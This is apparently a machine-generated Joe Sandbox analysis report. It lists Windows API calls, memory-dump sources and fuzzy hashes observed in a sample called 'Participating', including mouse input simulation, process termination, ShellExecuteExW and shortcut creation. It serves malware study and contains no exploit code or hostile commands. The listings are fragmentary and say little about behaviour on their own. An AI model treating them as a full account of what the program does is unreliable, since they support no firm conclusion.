                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3368777196-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00D3FBEF,00000000,?,?,00000000,?,00D239E2,00000004,00000000,00000000), ref: 00D78CA7
                                                                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00D78CCD
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00D78D2C
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00D78D40
                                                                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00D78D66
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00D78D8A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 00D62D45
                                                                                                                                                                                                                                                                    • Part of subcall function 00D5EF33: GetWindowRect.USER32(?,?), ref: 00D5EF4B
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D62D6F
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00D62D76
                                                                                                                                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00D62DB2
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00D62DDE
                                                                                                                                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00D62E3C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2387181109-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00D455F9
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D45616
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D4564E
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4566C
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00D45674
                                                                                                                                                                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00D4567E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 72514467-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CE55D1,?,?,00D24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00CE5871
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D562C0
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00D563DA
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00D80CC4,00000000,00000001,00D80B34,?), ref: 00D563F3
                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00D56411
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                                                                                                                  • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                  • Opcode ID: f3f623d64d3131689ba49d409b87eedf8176974058b25aa7f6f1ac1003b1f695
                                                                                                                                                                                                                                                                  • Instruction ID: d1272a9ec0edf1eb5179ebf4be17bf019b1df8862b203ccbad6cbb939cb8b8db
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3f623d64d3131689ba49d409b87eedf8176974058b25aa7f6f1ac1003b1f695
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67D13475A043019FCB14DF25C48092ABBE5FF89715F58885CF8899B361DB31EC49CBA2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D78740
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00D78765
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00D7877D
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00D787A6
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00D5C1F2,00000000), ref: 00D787C6
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00D787B1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                  • Opcode ID: bb2f94bbf426f6702ef6a9fd4702e0112f69d25fa85ff9e75276f95582e5386d
                                                                                                                                                                                                                                                                  • Instruction ID: cd1f5a81749efca14906c33f8474f305623abb80a388d7647900588e0f931a31
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb2f94bbf426f6702ef6a9fd4702e0112f69d25fa85ff9e75276f95582e5386d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67218371650345DFCB185F39CC48A6A3BA6EF45325F248629F96BC32E0FA308850DB30
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00D036E9,00D03355), ref: 00D03700
                                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D0370E
                                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D03727
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00D036E9,00D03355), ref: 00D03779
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                  • Opcode ID: 48cc1e46d11ab86e1d6cf4bd16157f2b8b6a50a7a620db9dd354cc8bdc179b98
                                                                                                                                                                                                                                                                  • Instruction ID: aa1a6a99189c85a1e5a339956b2f630bab90cf1cb4dce874f12a22ece420e8f7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48cc1e46d11ab86e1d6cf4bd16157f2b8b6a50a7a620db9dd354cc8bdc179b98
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A20124B264E3112EE62427B8BCC67673A9DEB467727200329F21C802F0FF528D025275
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00D04D53,00000000,?,?,00D068E2,?,?,00000000), ref: 00D130EB
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D1311E
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D13146
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 00D13153
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000), ref: 00D1315F
                                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 00D13165
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                  • Opcode ID: b90ab31b02c659eac67b5975dc8ecc224e4ff9569136d0b6101bdf4dbd27453c
                                                                                                                                                                                                                                                                  • Instruction ID: 99f4670c8e248089985d158d7dae12b29eed90d2ebf79749b545e61fc1d2ccc5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b90ab31b02c659eac67b5975dc8ecc224e4ff9569136d0b6101bdf4dbd27453c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F0447654470076D6122735FC07AEA266BDFC2771B254518F92DD23D1EE258AC241B1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00CE1F87
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: SelectObject.GDI32(?,00000000), ref: 00CE1F96
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: BeginPath.GDI32(?), ref: 00CE1FAD
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1F2D: SelectObject.GDI32(?,00000000), ref: 00CE1FD6
                                                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00D794AA
                                                                                                                                                                                                                                                                  • LineTo.GDI32(?,00000003,00000000), ref: 00D794BE
                                                                                                                                                                                                                                                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00D794CC
                                                                                                                                                                                                                                                                  • LineTo.GDI32(?,00000000,00000003), ref: 00D794DC
                                                                                                                                                                                                                                                                  • EndPath.GDI32(?), ref: 00D794EC
                                                                                                                                                                                                                                                                  • StrokePath.GDI32(?), ref: 00D794FC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 43455801-0
                                                                                                                                                                                                                                                                  • Opcode ID: 796fd3ae6dc13a9b6c19f88a221f4140b804c22be58a5a42f1d2e58defa15a44
                                                                                                                                                                                                                                                                  • Instruction ID: 04e549903aa6029245a304f476acc14262f76d116e78b8c2646670ff2b055429
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 796fd3ae6dc13a9b6c19f88a221f4140b804c22be58a5a42f1d2e58defa15a44
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE110C72000209FFDF029F90DC88EAA7F6DEF08364F04C115BA1985261D7719D95DBB0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00D45B7C
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D45B8D
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D45B94
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00D45B9C
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00D45BB3
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00D45BC5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                  • Opcode ID: 678a0828faf4e6e3452ac2b17c94cfbb57b63c4fa431527b20f29664eaa4e295
                                                                                                                                                                                                                                                                  • Instruction ID: 1e73f02a63776f79d8e8c952e9cbdb94db2feba6aebcbd33c971b9ce790db378
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 678a0828faf4e6e3452ac2b17c94cfbb57b63c4fa431527b20f29664eaa4e295
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44012C75A00718BBEB11ABA59C49F4EBFB9EF48751F144065FA09E7281E6709800CFA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CE32AF
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00CE32B7
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CE32C2
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CE32CD
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00CE32D5
                                                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CE32DD
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Virtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                  • Opcode ID: 87706fbef26ed12e081c986a6db4616d0639e364ac2f9b02a1b27a91e044e9ea
                                                                                                                                                                                                                                                                  • Instruction ID: f91c8fe584270b5b90cebefe772a3c3c5f64088a1581b98b69eebb63845fa70c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87706fbef26ed12e081c986a6db4616d0639e364ac2f9b02a1b27a91e044e9ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8016CB09017597DE3009F5A8C85B56FFB8FF19354F00411B915C47A41C7F5A864CBE5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D4F447
                                                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D4F45D
                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00D4F46C
                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D4F47B
                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D4F485
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D4F48C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                                                                                                                                                  • Opcode ID: f0757a216e13ef72b100032387cb356a50cae4a1f6fa4d1e44c1d981d002945a
                                                                                                                                                                                                                                                                  • Instruction ID: 0ff261488b2dcced23205e5bff213cb3ffd50b77f0ccd44240cea4b9fbf0488c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0757a216e13ef72b100032387cb356a50cae4a1f6fa4d1e44c1d981d002945a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CF05432241258BFE7215B629C0EEEF3F7DEFC6B11F000059FA09D1290E7A05A81C6B5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(?), ref: 00D234EF
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00D23506
                                                                                                                                                                                                                                                                  • GetWindowDC.USER32(?), ref: 00D23512
                                                                                                                                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00D23521
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00D23533
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(00000005), ref: 00D2354D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D421CC
                                                                                                                                                                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00D421D8
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D421E1
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00D421E9
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00D421F2
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D421F9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE41EA: _wcslen.LIBCMT ref: 00CE41EF
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D4CF99
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4CFE0
                                                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00D4D047
                                                                                                                                                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00D4D075
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00D6B903
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE41EA: _wcslen.LIBCMT ref: 00CE41EF
                                                                                                                                                                                                                                                                  • GetProcessId.KERNEL32(00000000), ref: 00D6B998
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D6B9C7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                  • String ID: <$@
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00D47B6D
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D47BA3
